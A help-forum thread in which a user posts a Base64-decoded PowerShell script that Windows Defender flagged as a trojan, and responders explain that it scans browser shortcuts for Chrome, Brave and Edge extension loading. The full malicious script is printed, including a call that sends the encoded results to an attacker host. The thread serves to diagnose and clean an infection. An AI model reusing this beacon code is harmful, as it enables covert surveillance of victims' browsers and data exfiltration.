Trojan code, can you tell me what it does?

I’ve been receiving Windows Defender notifications each half hour since a couple days. The afected file is a ‘.ps1’ file that is constantly appearing at the path ‘C:\Users\sualp\AppData\Local\Temp’.

I have opened it with the text editor and it was encrypted 2 times using 64 base. The code itself is this:

$searchPaths = @(
    "$env:USERPROFILE\Desktop",
    "$env:PUBLIC\Desktop",
    "$env:ALLUSERSPROFILE\Microsoft\Windows\Start Menu\Programs",
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs",
    "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar",
    "$env:USERPROFILE\OneDrive\Desktop"
);

function Get-Install {
    param (
        $appname
    )
    $active = 0;
    $inactive = 0;
    $rgx = New-Object 'System.Text.RegularExpressions.Regex' '\s?--load-extension=(("[^\r\n"]*")|([^\r\n\s]*))';
    $shell = New-Object -comObject WScript.Shell
    for ($searchPath_index = 0; $searchPath_index -lt $searchPaths.Count; $searchPath_index++) {
        $searchPath = $searchPaths[$searchPath_index];
        if ((Test-Path $searchPath) -eq $false) {
            continue;
        }
        $lnks = Get-ChildItem -Path $searchPath -Filter "*.LNK"
        foreach ($lnk in $lnks) {
            $lnkobj = $shell.CreateShortcut($lnk.FullName);
            $target = $lnkobj.TargetPath;
            if ((Test-Path $target) -eq $false) {
                continue;
            }
            $target = (Resolve-Path -Path $target).Path.ToLower();
            if ($target.EndsWith($appname, 'OrdinalIgnoreCase')) {
                $enabled = $false;
                $arguments = $lnkobj.Arguments;
                if ($null -ne $arguments) {
                    $m = $rgx.Match($arguments);
                    if ($m.Success -eq $true) {
                        $path = $m.Groups[1].Value;
                        $path = $path.Trim('"');
                        $enabled = ((Test-Path $path) -eq $true);
                    }
                }
                if ($enabled) {
                    $active++;
                }
                else {
                    $inactive++;
                }
            }
        }
    }
    return "$($active),$($inactive)";
}

$verified = "100`r`n";
$verified += "0,$(Get-Install 'chrome.exe')`r`n";
$verified += "1,$(Get-Install 'brave.exe')`r`n";
$verified += "2,$(Get-Install 'msedge.exe')`r`n";
Invoke-RestMethod -Uri 'http://api.private-chatting.com/update' -Headers @{ 'X-notify' = ([Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($verified))) }

Can someone please help me to understand what it really does? Thanks a lot

Hello alvarotik

I want you to note I am no expert! But,

Trick is to know where you picked this up.

Do you or have you visited private-chatting[.]com intentionally? Have you done a web search to see if others have input about this site.

What the script is doing is probing your computer to see if you have google, brave or msedge installed, in one of six locations under $searchPaths and if you have their extension installed on those browsers.

Do a search for private-chatting in $env:APPDATA.
Take the string “$env:APPDATA” and enter it into powershell. It will give you a location.
In my case it was C:\Users\someuser\AppData\Roaming
Open Explorer to that location and do the search private-chatting. This might appear in a folder and that folder’s name will tell you where you picked up this script, maybe.

You can check one of the other locations under $searchPaths as well.

You can also check these same locations for ‘.LNK’ no quotes

The LNK files are shortcut files that are associated with Windows and developed by Microsoft Corporation. LNK is an acronym for LINK. LNK files (also known as shell links) are used as a reference to an original file. The script is looking for shortcuts probably to the extension created by private-chatting[.]com

This will help you determine what is going on further.

This script then sends a header to api[.]private-chatting[.]com/update. What they do with it depends on what you can find out from the steps I have given you above.

Again, I did not run any dianostics on it. I do not have your environment to do that with. I only read the script. I am no expert. But you will be able to figure out more if you follow the steps I gave you.

1 Like

220613

Hello alvarotik

While I replied to your post I make the mistake of creating active links to private-chatting .com and recieved a message from a moderator that I need to fix this.

That message you should read:

Please edit your post and remove the hyperlinks.
VirusTotal lists the site as known malware/spyware.

Google is your friend:

https://answers.microsoft.com/en-us/windows/forum/all/powershell-virus/a82c44c2-e0df-4be9-8235-b12f1b404502